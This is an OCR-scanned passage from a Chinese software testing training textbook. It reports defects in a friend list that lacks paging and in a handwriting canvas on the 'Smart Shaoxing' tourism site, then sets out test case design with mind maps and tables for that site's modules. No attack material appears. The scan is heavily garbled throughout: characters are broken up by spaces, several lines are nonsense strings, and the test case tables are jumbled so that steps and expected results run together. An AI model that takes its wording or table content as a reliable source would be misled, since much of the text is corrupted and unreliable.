好 友 推荐 ， 有 兴趣 就 加 吧 … 


— :总 fs — UNDTHRUUHUS, NEATIS. E + Wmv 
&. 


? 


2 


KASESE 
等 sepan 人 生 两 大 非 则  — RITAGBK , —RRRERE 


图 5-21 好 友 展示 不 支持 翻 页 
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N. 专家 点 评 

当 只 有 一 个 好 友 时 ,界面 是 美观 的 ; 当 站 点 只 有 10 个 用 户 时 ,好 友 推 荐 也 是 美观 的 ; 但 
是 当 人 数 呈 几何 增长 时 , 则 要 考虑 网 页 能 不 能 正常 显示 、 翻 页 。 

通过 “我 的 好 友 ” 网 页 测试 发 现 , 当 网 站 注册 人 数 增多 时 ， 我 的 好 友 列 表 ” 等 待 我 批准 
的 好 友 列 表 ”“ 我 的 好 友 请 求 ,等 待 他 人 批准 列表 ”好 友 推 荐 ”这 几 项 都 需要 支持 翻 页 功能 ， 
否则 ,这 个 页 面 最 后 就 无 法 使 用 与 查看 。 所 以 ,程序 员 在 设计 网 站 时 一 定 要 有 前 瞻 性 ,要 能 
看 到 当 网 站 数据 增 大 到 不 同 数 量 级 时 网 站 与 网 页 的 设计 与 维护 。 


5.20 实验 #20: 智慧 绍兴 -手写 刻字 图 片 与 画布 问题 


缺陷 标题 智慧 绍兴 一 到 此 一 游 一 手写 刻字 ,图 片 与 画布 在 不 同 计算 机 中 展示 不 同 。 
测试 平台 与 浏览 器 Windows 10 十 Chrome 或 Firefox/Windows 7 十 Chrome。 
测试 步骤 

(1) 打开 智慧 绍兴 网 站 http://www. rogisoft. com/zhsx。 

(2) 单 击 导 航 条 中 的 “到 此 一 游 ”~* 手 写 刻 字 ”, 然 后 单 击 “ 体 验 手 写 刻 字 ”。 

(3) 在 不 同 的 机 器 上 选择 图 片 ,体验 手写 刻字 。 
期 望 结果 ”选择 的 图 片 与 底 色 的 画布 能 完美 配合 在 一 起 。 








实际 结果 ”不同 机 器 上 选择 的 图 片 与 底 色 的 画布 不 能 完美 配合 .有 的 出 现 空白 画布 , 正 


常 的 如 图 5-22 所 示 ,不 美观 的 情形 如 图 5-23 所 示 。 


智慧 绍兴 -手写 刻字 








| Browse. | [prenna] | 进入 RES 站 看 




















QO È Ó sesessas , gessi — am j 





图 5-22 ”图片 与 画布 满 屏 ,方便 手写 刻字 (Windows 10 十 Chrome) 


软件 测试 实验 实 训 指南 








Choose File | No fie chosen HIER). AdUDTRER 











O O Ò sumarse, neam L... 





图 5-23 图 片 与 画布 没 满 屏 ,部 分 画布 区 域 空白 (Windows 7+ Chrome) 


xS 专家 点 评 


当 程序 员 在 设计 手写 刻字 时 ,是 基于 自己 的 计算 机 进行 测试 .调试 的 ,不 同 图 片 的 拉 伸 
与 画布 的 配合 在 程序 员 自 己 的 计算 机 上 是 正确 的 。 但 是 换 到 另 一 台 计 算 机 ,可 能 就 有 问题 ， 
这 主要 是 用 不 同 的 浏览 器 解析 ,不 同 计算 机 的 屏幕 显示 分 辨 率 设计 不 一 样 , 导 致 许多 意 想 不 
到 的 结果 。 这 就 要 求 测试 人 员 在 测试 时 要 留意 跨 平 台 和 跨 浏览 器 的 测试 结果 。 


W 拓展 训练 


找 出 以 下 网 站 的 探索 缺陷 (测试 人 员 在 这 些 网 站 时 ,也 可 以 换 成 自己 的 账户 测试 ) 。 

(1) 百度 搜索 : www. baidu. com. 

(2) 微软 搜索 : www. bing. com, 

(3) QQ 空间 : http://user. qzone. qq. com/470701012/infocenter, 

(4) 新 浪 微 博 : http: //weibo. com/roywangl123, 

(5) 腾讯 微 博 : http://t. qq. com/roywang123。 

(6) 豆 丁 文库 : http://www. docin. com/roywang123, 

(7) 新 浪 爱 问 知识 共享 : http: //iask. sina. com. cn/u/1853705661 /ish, 

(8) 百度 网 盘 知识 共享 http://pan. baidu. com/share/home? uk 一 2952985194。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 探索 相关 的 缺陷 。 
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读书 笔记 Name: Date: 








励志 名 句 : God helps those who help themselves. 





自助 者 天 助 之 。 
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设计 测试 用 例 实 训 


【 本 篇 导读 】 


本 篇 通过 对 智慧 城市 、 在 线 合议、 在线 协作 、 
电子 商务 、 电 子 书 籍 、 手 机 应 用 等 系统 测试 用 例 
设计 与 分 析 ， 使 读者 对 测试 用 例 有 一 个 全 面 的 认 
识 ， 引 导读 者 从 模仿 到 实践 ， 再 到 创新 。 

本 篇 不 仅 讲 解 黑 例 测试 用 例 的 编写 方法 ， 而 
且 讲 解 常见 应 用 的 白 颌 测试 用 例 的 编写 方法 ， 包 
RAPER AR, GA p RA, DAR 
记 等 源 代码 的 分 析 ， 设 计 完 备 的 测试 用 例 ， 本 篇 
还 补充 了 回归 测试 类 测试 用 例 的 设计 方法 ， 因 为 
某 些 情况 下 ， 程 序 员 可 能 只 改 了 部 分 功能 ， 影 响 
面 有 限 ， 不 需要 把 所 有 的 测试 用 例 都 运行 一 遍 。 

本 篇 众多 测试 用 例 的 设计 ,主要 是 给 大 家 讲 
解 设 计 思 路 ， 引 导读 者 思考 应 该 如 何 划分 模块 ， 
如 何 考 虎 周到， 如 何 找到 重点 。 读 者 自己 也 可 以 
动手 党 试 设计 ， 过 段 时 间 再 看 看 自己 的 设计 有 什 
么 地 方 可 以 完善 。 或 者 有 什么 地 方 以 前 设计 时 考 
虑 不 周到 。 通 过 不 断 的 演练 .提高 自己 的 思维 严 
R, RERE- TREED, EARE, A 
晰 、 易 执行 的 测试 用 例 。 
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智慧 绍兴 这 个 智慧 城市 系统 主要 包括 个 性 化 旅游 空间 服务 平台 、 
景区 智能 导航 系统 、 景 点 互动 展示 系统 、 到 此 一 游 电子 刻字 系统 、 景 
特产 优惠 购 五 大 系统 。 本 实验 通过 思维 导 图 理 清 五 大 模块 脉络 ,然后 
有 的 放 矢 地 进行 各 个 模块 的 深入 设计 ,从 整体 到 局 部 ,再 从 局 部 呼应 
到 整体 ,一 目 了 然 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 测试 
用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 。 当 然 有 的 测试 用 例 设计 可 
能 是 自动 化 工具 去 执行 ,这 就 更 需要 测试 用 例 的 设计 要 有 清晰 的 输入 
和 最 终 的 验证 点 。 


6.1 智慧 绍兴 项 目 总 述 


智慧 绍兴 的 网 址 为 http://www. rogisoft. com/zhsx, 这 是 一 个 
以 绍兴 景区 地 理 信息 为 基础 ,融合 人 机 智能 交互 技术 .路径 规划 技术 、 
移动 互联 技术 以 及 多 媒体 互动 展示 技术 等 ,基于 智能 交互 平板 ,面向 
旅客 .景区 .商家 等 角色 提供 景区 导航 、. 导 览 . 导购, 书法、 刻字 等 一 系 
列 服务 的 项 目 。 系 统 模块 功能 如 图 6-1 所 示 。 

1. 个 性 化 旅游 空间 服务 平台 

主要 为 旅客 .景区 提供 一 个 个 性 化 信息 展示 ,信息 互动 的 平台 。 
如 旅客 可 以 将 到 此 一 游 电 子 刻 字 系 统 中 形成 的 刻字 、 照 片上 传 到 自己 
的 个 性 空间 ,参与 优秀 作品 评选 ,同时 可 以 获取 积分 以 兑换 门票 或 特 
色 小 吃 ,景区 、 商 家 也 可 通过 该 服务 平台 展示 最 新 的 景点 旅游 活动 、 特 
色 小 吃 等 信息 。 

2. 景区 智能 导航 系统 

为 旅客 在 景区 内 随时 随地 提供 景点 参观 导航 ,支持 语音 、 触 摸 书 
写 等 方式 的 智能 输入 ,以 满足 移动 智能 终端 设备 应 用 需求 。 


x 
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图 6-1 智慧 绍兴 系统 模块 功能 图 


3. 景点 互动 展示 系统 

将 各 景点 用 多 媒体 制作 技术 实现 数字 化 ,方便 旅客 每 到 一 景点 都 能 很 全 面 地 了 解 该 景 
点 的 历史 由 来 .典故 ,全 景 、 最 佳 游 玩 路 线 等 信息 ,支持 多 点 触摸 操作 。 

4. 到 此 一 游 电 子 刻字 系统 

为 喜欢 在 景区 内 刻字 留言 的 旅客 提供 一 个 电子 刻字 留言 系统 ,旅客 可 任 选 特色 景点 为 
背景 , 刻 上 自己 的 留言 ,同时 也 可 以 拍照 ,通过 无 线 上 传 到 个 性 旅游 空间 , 既 可 以 做 到 不 破坏 
旅游 资源 ,又 可 满足 旅客 “到 此 一 游 ? 刻 字 留 言 的 需求 。 

5. 景区 特产 优惠 购 

提供 景区 内 商家 、 产 品 信息 的 数字 化 展示 ,并 提供 手机 或 Pad 扫 一 扫 获 取 优惠 券 的 功 
能 ,为 旅客 购物 提供 既 方便 又 实惠 的 通道 。 


6.2 智慧 绍兴 系统 测试 用 例 设计 思路 


从 6. 1 节 的 描述 可 以 看 出 ,这 是 一 个 流程 不 算 简 单 的 项 目 . 同 样 ,测试 前 必须 明确 这 个 
项 目 要 实现 的 功能 是 哪些 ,需要 测试 的 点 有 哪些 ,哪些 地 方 需要 特别 注意 。 

对 于 类 似 智慧 绍兴 这 种 功能 比较 多 的 项 目 ,同样 建议 在 设计 测试 用 例 前 , 先 将 测试 方案 
整理 清楚 ,做 成 思维 导 图 。 思 维 导 图 能 更 方便 看 出 测试 用 例 设 计 的 缺陷 和 遗漏 点 ,可 读 性 非 
常 强 , 修 改 也 很 方便 。 智 慧 绍 兴 主 要 功能 思维 导 图 如 图 6-2 所 示 。 

智慧 绍兴 的 功能 模块 按 系 统 划分 是 最 清楚 的 ,容易 整理 思路 。 按 这 个 思路 整理 好 思 
维 导 图 ,验证 点 就 更 加 清晰 ,每 次 写 完 再 回顾 一 遍 也 非常 方便 ,并 且 还 能 一 眼看 出 设计 路 
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我 的 空间 
—— “个 性 化 旅游 空间 服务 平台 





Xm JD 


最 区 智能 导航 系统 在 智慧 绍兴 首页 单 击 “ 智 能 导航 ”六 CD 
69] 区 智能 导航 系统 H4 p 

在 智能 导航 首页 单 击 “ 智 慧 首页 " J—CO 
“景点 互动 ”进入 景点 互 


"EET 动 展示 系统 
一 一 | 景点 互动 展示 系统 £! 
ELITS GREHZRGGUAHUGRE “反问 (CD 


在 导航 条 中 单 击 “ 特 



















































智慧 绍兴 - 在 导航 条 中 单 击 
到 此 一 游 电子 刻字 系统 

在 导航 条 中 单 击 “ 手 写 刻 字 ” 

在 导航 条 中 单 击 -oD 








在 智慧 绍兴 首先 单 击 “ 景 区 特产 ”进入 景区 
特产 优惠 购 主页 


在 导航 条 中 单 击 “ 
































在 导航 条 中 单 击 “ 电 子 优惠 券 ” 


景区 特产 优惠 购 


在 导航 条 中 单 击 “商家 ” 


在 导航 条 中 单 击 “ 商 品 展示 ” 
















在 导航 条 中 单 击 “ 特 产 小 故事 " 








图 6-2 智慧 绍兴 主要 功能 思维 导 图 


6.3 个 性 化 旅游 空间 模块 测试 用 例 设计 


个 性 化 旅游 空间 服务 平台 是 本 项 目的 一 大 亮点 , 它 面 向 旅客 .景区 提供 一 个 信息 展示 、 
互动 的 服务 平台 ,主要 包括 首页 我 的 空间 .照片 下 载 、 优 秀 作品 评选 .照片 上 传 、 积 分 管理 、 
后 台 管 理 .旅游 攻略 .景区 介绍 .促销 活 动 ,智慧 博客 等 功能 。 

个 性 化 旅游 空间 服务 平台 “我 的 空间 ”页 面 展示 如 图 6-3 所 示 。 

个 性 化 旅游 空间 服务 平台 “美景 欣赏 "页 面 展 示 如 图 6-4 所 示 。 

因为 个 性 化 旅游 空间 服务 平台 大 部 分 测试 用 例会 在 白 盒 测试 用 例 中 涉及 ,这 里 仅 简单 
地 设计 几 条 用 例 , 以 便 了 解 智慧 绍兴 项 目的 特色 之 处 。 个 性 化 旅游 空间 服务 平台 测试 用 例 
设计 如 表 6-1 所 示 。 


xS 专家 点 评 


个 性 化 旅游 空间 服务 平台 涉及 注册 登录 ,以 及 登录 前 后 不 同 的 操作 、 管 理 员 和 普通 用 户 
登录 的 不 同 权限 ,可 测试 点 非常 多 ,但 由 于 本 书 的 白 盒 测试 章节 有 对 本 系统 非常 详细 的 用 例 
设计 ,这 里 不 再 重复 描述 。 读 者 也 可 以 按 自己 喜欢 的 方式 先 设计 出 测试 用 例 , 然 后 再 对 比 怎 
样 设 计 更 好 ,效率 更 高 。 
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图 6-3 “我 的 空间 "页面 展示 
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图 6-4 “美景 欣赏 "页面 展示 
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表 6-1 个 性 化 旅游 空间 服务 平台 测试 用 例 设 计 














_ 实际 测试 
测试 用 例 标题 RESE 期 望 结果 es 
CD 智慧 绍兴 首页 展示 正常 ,导航 
O 未 登录 用 户 用 浏览 器 打开 智慧 绍 | 。 条 未 尾 展示 “登录 "按钮 
兴 首 页 http://www. roqisoft | 2) 页 面 跳 转 到 登录 页 面 ,页 面 展 
iioii ie com/zhsx 示 用 户 名 和 密码 输入 框 “ 记 住 
utin CD 在 首页 导航 条 中 单 击 “ 我 的 空间 "| 。 我 * 选 项 “登录 "按钮 .返回 首 
CD 输入 正确 的 用 户 名 密码 ,并 单 击 | š 页 链接 和 注册 新 用 户 链接 
“登录 "按钮 (3) 登录 成 功 , 跳 转 到 该 用 户 的 “个 
人 游记 "页 面 
CD 智慧 绍兴 首页 展示 正常 ,导航 
条 未 尾 展示 “退出 "按钮 
O 页面 跳 转 到 “个 人 游记 ”页 面 ， 
CD 已 登录 用 户 用 浏览 器 打开 
pii uisi n, 页 面 展示 个 人 相关 信息 ,以 及 
com/zhsx ü m TASKE 
(3) , ES 
(2) 在 首页 导航 条 中 单 击 “ 我 的 空间 "| Š vial c siiis 
已 登录 用 户 在 首 | (3) 单 击 * 点 我 写 游记 
(4) 未 
页 单 击 “ 我 的 空 | (4) 单 击 写 博客 页 的 链接 人 
ii ios C5) 博客 按 发 布 时 间 倒序 排列 , 列 
间 "链接 (5) 写 完 博客 单 击 “发 布 "按钮 
© 在 草稿 和 文章 列表 ,分 别 选 中 博 | 。 表 包 含 刚 提交 的 博文 
(6) 博文 删除 成 功 ,列表 中 不 存在 
文 , 单 击 删除 
VN panos 已 删除 博文 
dicis RR D 展示 评论 列表 ,每 条 展示 评论 
内 容 、 时 间 、 评 论 者 及 评论 的 
博文 
(8) 可 删除 ,可 回复 
CD 智慧 绍兴 首页 展示 正常 ,导航 
(D 已 登录 用 户 用 浏览 器 打开 智慧 绍 | 。 条 未 尾 展示 “退出 "按钮 
兴 首 页 http://www. roqisoft. | (2) 页 面 跳 转 到 “我 的 好 友 ” 页 面 ， 
“我 的 空间 ”一 “我 m 
的 好 友 ” com/zhsx 页 面 展 示 个 人 相关 信息 、 我 的 


(2) 在 首页 导航 条 中 “我 的 空间 ”下 拉 
列表 中 单 击 “ 我 的 好 友 ” 


好 友 列 表 、 等 待 我 批准 的 好 友 
列表 我 的 好 友 请 求 、 等 待 他 人 
批准 列表 ,以 及 好 友 推 荐 列表 





“我 的 空间 ”一 “我 
的 关注 ” 





OD 已 登录 用 户 用 浏览 器 打开 智慧 绍 
兴 首 页 http://www. roqisoft. 
com/zhsx 

(2) 在 首页 导航 条 中 “我 的 空间 ”下 拉 
列表 中 单 击 “ 我 的 关注 ” 





(1) 智慧 绍兴 首页 展示 正常 ,导航 
条 末尾 展示 “退出 ?按钮 

D 页 面 跳 转 到 “我 的 关注 ”页 面 ， 
页 面 展示 个 人 相关 信息 、 我 关 
注 谁 列表 、 谁 关注 我 列表 ,以 及 
关注 推荐 列表 
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续 表 
测试 用 例 标题 RESE 期 望 结果 人 
CD 智慧 绍兴 首页 展示 正常 ,导航 
条 未 尾 展示 “退出 "按钮 
(D 页 面 跳 转 到 “个 人 相册 ”页 面 ， 
页 面 展示 “上 传 图 片 ”按钮 ,可 
c 已 登录 用 户 用 浏览 器 打开 智慧 组 | ERRATA IE EAM 
兴 首 页 http://www. roqisoft. 喜欢 的 方式 展示 相册 图 片 
com/zhsx 
“我 的 空间 "-…“ 个 | 2) 在 首页 导航 条 中 我 的 空间 "下 拉 | O EEA ARITE 
人 相册 ” 列表 中 单 击 “个 人 相册 ” lr krieg ecd 
M Ad 上 传 图 片 " 按 钮 RAR, ZIP, GIF, JPG, JPEG, 
CD 选择 正确 格式 的 图 片 , 单 击 上 传 | RARI 
(S) 选中 某 张 照 片 , 单 击 删除 C 图 片上 传 成 功 ,图 片 列表 展示 
正确 
(5) 跳 转 到 二 次 确认 页 面 ,确认 出 
除 照片 成 功 后 ,照片 不 在 列表 
中 展示 
CO 普通 用 户 登 录 知 下 细 兴 首页 ,在 |(1) 页 面 跳 转 到 * 积 分 管理 "页 面 ， 
首页 “我 的 空间 ”下拉 列表 中 选择 | 0 现下 中转 到 积分 管理 页面， 
“我 的 空间 ”一 “ 积 | 。 “积分 管理 ” peint RM 
分 管理 ” (D 超级 管理 员 登 录 智 慧 绍兴 首页 ， n. 
在 首页 “我 的 空间 ”下 拉 列 表 中 选 | 2) p IDE lA RAN 
择 “积分 管理 AB 
(D) 普通 用 广 登 录 短 整 绍兴 首页 , 光 |(]) “我 的 空间 "下 拉 列 表 中 不 展示 
,ww sa 。 标 放 在 “我 的 空间 ”链接 上 “我 的 空间 ” 
我 的 空间 ”“ 后 后 台 管理 "链接 
T (2) 超级 管理 员 登录 智慧 绍兴 首页 ,| (2) 进入 后 台 管理 页 面 ,对 后 台 进 
在 首页 “我 的 空间 "下拉 列表 中 选 | 2 ES s 
择 “后 台 管 理 ” 
CD 进入 “优秀 作品 展示 ”页 面 , 展 
CO 未 登录 用 户 在 首页 导航 条 中 单 击 | 。 示 优秀 书法 作品 
“美景 欣赏 *"“ 优 | “美景 欣赏" 一 “优秀 作品 ” (2) 跳 转 到 登录 页 面 
秀 作品 ” CD 单 击 “ 优 秀 作品 上 传 ” (3) 登录 成 功 , 跳 转 到 “优秀 作品 上 
(3) 输入 正确 的 用 户 名 和 密码 传 ”页 面 ,展示 优秀 作品 上 伟 
规则 
CD 进入 旅游 攻略 博文 列表 页 面 ， 
展示 各 博文 详细 信息 
CD 未 登录 用 户 在 首页 导航 条 中 单 击 | (2) 进入 菜 博文 详情 页 面 ,最 下 方 
“美景 欣赏 ">“ 旅 “美景 欣赏 ”一 “旅游 攻略 ” 展示 评论 入 口 ,评论 人 的 姓名 、 
Et CD 单 击 某 博文 标题 邮箱 主页 信息 等 
(3) 填写 评论 并 提交 (3) 评论 成 功 ,文章 评论 总 数 加 1, 
W 已 登录 用 户 进入 博文 详情 页 面 浏览 数 加 1 








(4) 最 下 方 展示 评论 人 信息 和 评论 
输入 框 ,以 及 “评论 "按钮 
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续 表 
实际 测试 
R E fE 2 E 
测试 用 例 标 题 操作 步骤 期 望 结果 (Pass/Fail) 
“美景 欣赏 ”一 “ 景 区 | 用 户 在 首页 导航 条 中 单 击 “ 美 景 欣 展示 绍兴 各 旅游 景区 简介 ,包括 地 
介绍 ” RENA” 址 、 交 通 、 门 票 及 开园 时 间 等 信息 
CD 用 户 在 首页 导航 条 中 单 击 “ 美 | OD. 进入 博客 首页 ,展示 博文 列表 
NT 景 欣赏 ”一 “智慧 博客 ” (2) 进入 某 博 文 详情 页 面 ,最 下 方 
. za (2) 单 击 博文 标题 或 “阅读 全 文 ” 展示 评论 入 口 
链接 G) 评论 成 功 ,文章 评论 总 数 加 1， 
(3) 填写 评论 并 提交 浏览 数 加 1 





6.4 景区 智能 导航 模块 测试 用 例 设计 


景区 智能 导航 系统 是 基于 绍兴 各 景区 地 图 信息 ,利用 路 径 规划 技术 ,融合 语音 、 触 控 等 
人 机 智能 交互 技术 所 形成 的 导航 系统 ,主要 包括 景区 电子 地 图 .路 径 规 划 、 智 能 导航 等 功能 
模块 。 景 区 智能 导航 系统 页 面 展示 如 图 6-5 所 示 。 





图 6-5 景区 智能 导航 系统 页 面 展 示 


区 智能 导航 系统 思维 导 图 如 图 6-6 所 示 。 
区 智能 导航 系统 测试 用 例 , 如 表 6-2 所 示 。 


g 专家 点 评 


景区 智能 导航 系统 应 该 是 智慧 绍兴 这 个 项 目 可 用 性 最 大 的 一 个 系统 , 刚 拿 到 项 目 时 ,可 
能 有 人 会 觉得 这 里 的 测试 用 例会 特别 多 ,然而 事实 并 不 是 这 样 ,这 是 为 什么 呢 ? 因为 景区 知 
能 导航 系统 里 引用 的 是 高 德 地 图 ,定位 成 功 后 ,导航 功能 是 属于 高 德 地 图 ,而 不 是 智慧 绍兴 ， 
所 以 在 设计 测试 用 例 的 第 一 条 硬性 条 件 是 明确 需求 范畴 ,超出 范畴 的 测试 都 属于 帮助 别人 
工作 。 
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在 智能 导航 首页 导航 条 中 单 击 名 选项 








将 智能 导航 首页 右 侧 滚动 条 向 下 拉 ] 





景区 智能 导航 系统 





目的 地 智能 输入 D 


m 
景区 电子 地 图 D 


路 径 规 划 
智能 导航 











D 





D 








图 6-6 景区 智能 导航 系统 思维 导 图 


表 6-2 景区 智能 导航 系统 测试 用 例 设计 














实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 Poata 
(o 用 户 在 智慧 组 兴 首页 单 击 “ 智 | 1) ŽA TARI ERREN, 
“智能 导航 ”一 “目的 | 。 能 导航 ” 
MWEMA” [D 单 击 智能 导航 首页 “目的 地 智 | O A E ie e H 
能 输入 ”中 的 “功能 体验 "按钮 | pa A 
CD 进入 导航 首页 ,页 面 展示 美观 、 
Q 用 户 在 智慧 绍兴 首页 单 击 “ 智 无 错误 
. "T 能 导航 ” (2) 进入 景区 电子 地 图 ,展示 绍兴 
Pase 景区 | (2) 单 击 智能 导航 首页 “景区 电子 | 。 几 大 景区 列表 
地 图 "中 的 “功能 体验 "按钮 | (3) 进入 西施 故里 的 景区 电子 地 
(3) 选择 其 中 一 个 景区 : 西施 故里 | 。 图 ,包括 景区 二 维 电子 地 图 展 
示 、 地 图 温 游 和 放大 .缩小 功能 
CD 进入 导航 首页 ,页面 展示 美观 、 
(1) 用 户 在 智慧 绍兴 首页 单 击 “ 智 | xus 
- 能 导航 ” (2) 进入 高 德 地 图 ,地 图 准确 定位 ， 
Feli 路 径 | (2) 单 击 智能 导航 首页 “路 径 规划 "| 。 可 放大 缩小 
中 的 “功能 体验 "按钮 (3) 根据 目的 地 规划 路 线 ,实时 语 
(3) 输入 景区 内 目的 地 音 导航 提示 ,默认 步行 路 线 ,成 
功 引导 用 户 到 达 目 的 地 
QD 进入 导航 首页 ,页 面 展示 美观 、 
co 用 户 在 智慧 绍兴 首页 单 击 “ 智 | ， 无 错误 
abe (D KEERA: SEHR 
GPS 
e DNE er O 页 面 展示 整个 大 范围 地 图 , 没 
“智能 导航 ”一 “智能 |(。) LA 有 确切 定位 
导航 ” s. (4) 展示 西施 故里 景区 1 号 路 线 





(5) 选择 智能 导航 中 的 线路 2 体验 
(6) 用 户 在 “鲁迅 故居 ” 单 击 智能 导 
航 中 的 线路 1 体验 





图 ,用 户 可 跟随 语音 导航 旅游 
展示 西施 故里 景区 2 号 路 线 
图 ,用 户 可 跟随 语音 导航 旅游 
展示 鲁迅 故居 景区 1 号 路 线 
图 ,用 户 可 跟随 语音 导航 旅游 
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6.5 景点 互动 展示 模块 测试 用 例 设 计 


将 景区 内 各 景点 用 多 媒体 互动 技术 实现 数字 化 ,以 视频 动画 、 图 片 .文字 等 形式 通过 智 
能 交互 平板 展示 ,方便 旅客 每 到 一 个 景点 都 能 全 面 了 解 该 景点 的 历史 由 来 .典故 、 全 景 . 最 佳 
游玩 路 线 等 信息 。 主 要 功能 模块 包括 景点 概况 、 景 区 品味 、 场 馆 介绍 、 服 务 、 历 史 由 来 .购物 
指南 \ 特 色 介绍 、 休 闲 项 目 , 博 物 馆 、 攻 略 游记 、 全 景 展示 等 。 

因为 景点 互动 展示 系统 只 具有 展示 功能 ,所 以 测试 点 非常 简单 ,只 需要 链接 都 正确 、 页 
面 展示 都 美观 , 且 体 验 度 高 就 行 。 这 里 以 “西施 故里 ”为 例 ,景点 互动 展示 系统 样 例 展示 如 
图 6-7 所 示 。 





D wNÉXRSSS ex 


€ > © [O wwroqisoftcom/zhsx/)dnd/ 


fo be it g ` 








旅游 攻略 


e. 
- ANS < 


图 6-7 景点 互动 展示 系统 样 例 展示 
景点 互动 展示 系统 思维 导 图 如 图 6-8 所 示 。 











西施 简介 链接 







景点 互动 展示 系统 旅游 攻略 链接 





TEI 


畅游 故里 链接 








音乐 播放 器 





图 6-8 景点 互动 展示 系统 思维 导 图 
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景点 互动 展示 系统 测试 用 例 ,如 表 6-3 Bron 。 
表 6-3 景点 互动 展示 系统 测试 用 例 设计 




















实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 ee 
(1) 展示 西施 故里 景点 互动 主题 、 
CD 用 户 用 浏览 器 访问 景点 互动 首 | “西施 简介 ”旅游 攻 略 " 和 “ 畅 
EPA 页 http://www. roqisoft com/ 游 故 里 ”链接 
£r 西施 | 。 zhsx/jdhd/ (2) 进入 西施 简介 首页 ,展示 西施 
(2) 单 击 “西施 简介 "链接 或 者 页 面 | 。 基本 信息 “爱情 传说 "历史 典 
非 链接 任意 处 故 * 和 * 相 关 作品 "链接 都 正确 ， 
且 页 面 介绍 正确 
展示 旅游 攻略 目录 ,包括 历史 由 来 、 
“景点 互动 ">“ 旅 游 用 户 在 景点 互动 首页 单 击 “ 旅 游 攻 | 景 点 概况 .攻略 游记 ,全 景 展示 和 服 
攻略 ” 略 "链接 务 ,链接 跳 转 正确 , 且 页 面 展示 美 
观 .正确 
pepe n . 展示 畅游 故里 目录 ,景区 特产 ”和 
arm 畅游 PERAN TU iar e BAREA HN 
展示 美观 .正确 
guise m LAE sg EA JUR B zb RR. STRE A 
播放 器 ” cdi ; 续 播放 、 刷 新 页 面 重新 播放 
(1) 分 别 使 用 Firefox 最 新 3 个 版 
Æ „Chrome 最 新 3 个 版 本 以 及 | (1) 页 面 展示 美观 .正确 ,放大 、 缩 
IE 3 个 版 本 访问 http://www. | ”小 显示 正常 ,各 浏览 器 展示 
“景点 互动 ”一 兼容 rogisoft. com/zhsx/jdhd. 单 击 一 致 
性 测试 各 链接 D 页 面 展示 美观 、 正 确 , 放 大 、 缩 





(2) 用 手机 浏览 器 访问 http:// 
www. roqisoft. com/zhsx/ 


jdhd, 点 击 各 链接 


EO ELI] 





小 显示 正常 ,各 浏览 器 展示 
一 至 








景点 互动 展示 系统 能 帮助 游客 更 好 地 了 解 某 个 景点 的 特色 、 历 史 及 文化 等 ,是 制定 旅游 
攻略 的 一 个 参考 ,也 是 旅游 时 的 一 个 重要 工具 。 有 了 景点 互动 展示 系统 ,相当 于 有 了 一 个 免 


费 导 游 。 


这 个 系统 测试 的 重点 就 是 链接 跳 转 正确 ,页 面 信 息 正 确 且 美观 ,这 种 类 型 的 需求 最 需要 
兼容 性 测试 。 大 家 也 可 以 尝试 更 多 的 测试 用 例 。 


6.6 到 此 一 游 电 子 刻字 模块 测试 用 例 设 计 


以 智能 交互 平板 为 硬件 展示 载体 ,为 旅客 提供 到 此 一 游 电子 刻字 书法 留念 功能 。 主 要 
功能 包括 特色 景点 库 、 字 体 选 择 . 电 子 刻字 书法 墨宝 ,拍照 .手机 照片 上 传 、 上 传 个 性 旅游 空 


间 、 刻 字 打 印 等 。 


CD 特色 景点 库 : 提供 大 量 的 特色 景点 图 片 ,以 便 旅客 刻字 时 选择 。 


实验 6 ”设计 智慧 城市 类 测试 用 例 














(2) 字体 选择 : 提供 多 种 刻字 字体 ,以 便 旅 客 使 用 。 

(3) 电子 刻字 : 通过 触摸 书写 ,在 选择 的 景点 背景 图 片上 进行 刻字 留念 。 

(4) 书法 墨宝 : 为 旅客 提供 电子 书法 ,在 留 下 墨宝 ,同时 系统 会 将 留 下 的 墨宝 推送 
到 个 性 旅游 服务 空间 ,参加 评选 ,对 于 评选 优异 作品 会 在 旅游 景区 电子 屏 进行 展示 ,同时 会 
获得 相应 的 优惠 。 

(5) 拍照 : 提供 高 清 自拍 功能 ,同时 自动 将 照片 放 到 相应 的 景点 背景 图 片上 。 

(6) 手机 照片 上 传 : 提供 通过 无 线 从 手机 将 自拍 的 照片 上 传 到 刻字 系统 中 ,然后 自动 
放 到 景点 背景 合适 的 位 置 。 

CD 上 传 个 性 旅游 空间 : 提供 将 刻字 以 及 照片 上 传 到 个 性 旅游 空间 。 

(8) 刻字 打印 : 提供 将 刻字 和 照片 现场 打印 的 功能 。 





到 此 一 游 主页 展示 如 图 6-9 所 示 。 





图 6-9 到 此 一 游 主 页 展示 


到 此 一 游 思 维 导 图 如 图 6-10 所 示 。 








到 此 一 游 电子 刻字 系统 











— 在 导航 条 中 单 击 “ 手 写 

















在 导航 条 中 单 击 “ 书 











图 6-10 ”到 此 一 游 思 维 导 图 
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到 此 一 游 电子 刻字 系统 测试 用 例 , 如 表 6-4 所 示 。 
表 6-4 到 此 一 游 电子 刻字 系统 测试 用 例 

















mem 
测试 用 例 标题 操作 步骤 期 望 结果 Neid 
CO 智慧 绍兴 首页 展示 正常 ,未 登录 用 
(D 用 户 用 浏览 器 打开 智慧 绍兴 | 。 户 导航 条 末尾 展示 “登录 ”按钮 ,已 
首页 http://www. roqisoft | — 登录 用 户 展示 “退出 "按钮 
在 导航 条 中 单 击 com/zhsx (2) 页 面 跳 转 到 到 此 一 游 首 页 ,页 面 展 
“特色 景点 库 ” |O 在 首页 导航 条 中 单 击 “ 到 此 | 。 示 “ 特 色 景点 库 ”“ 手 写 刻字 ”电子 
一 游 ” 刻字 ”和 “书法 墨宝 "链接 
(3) 单 击 “特色 景点 库 ” (3) 进入 “特色 景点 库 " 页 面 ,展示 景区 
特色 景点 照片 
CD 进入 电子 刻字 首页 ,页面 展示 "体验 
(D 用 户 在 到 此 一 游 首页 单 击 | — 电子 刻字 ”按钮 和 电子 刻字 样 例 
“电子 刻字 "链接 (2) 页 面 跳 转 到 电子 刻字 页 面 ,页 面 展 
s (D 用 户 单 击 * 体 验 电子 刻字 "| 。 示 正常 ,美观 ,未 登录 用 户 调整 文字 
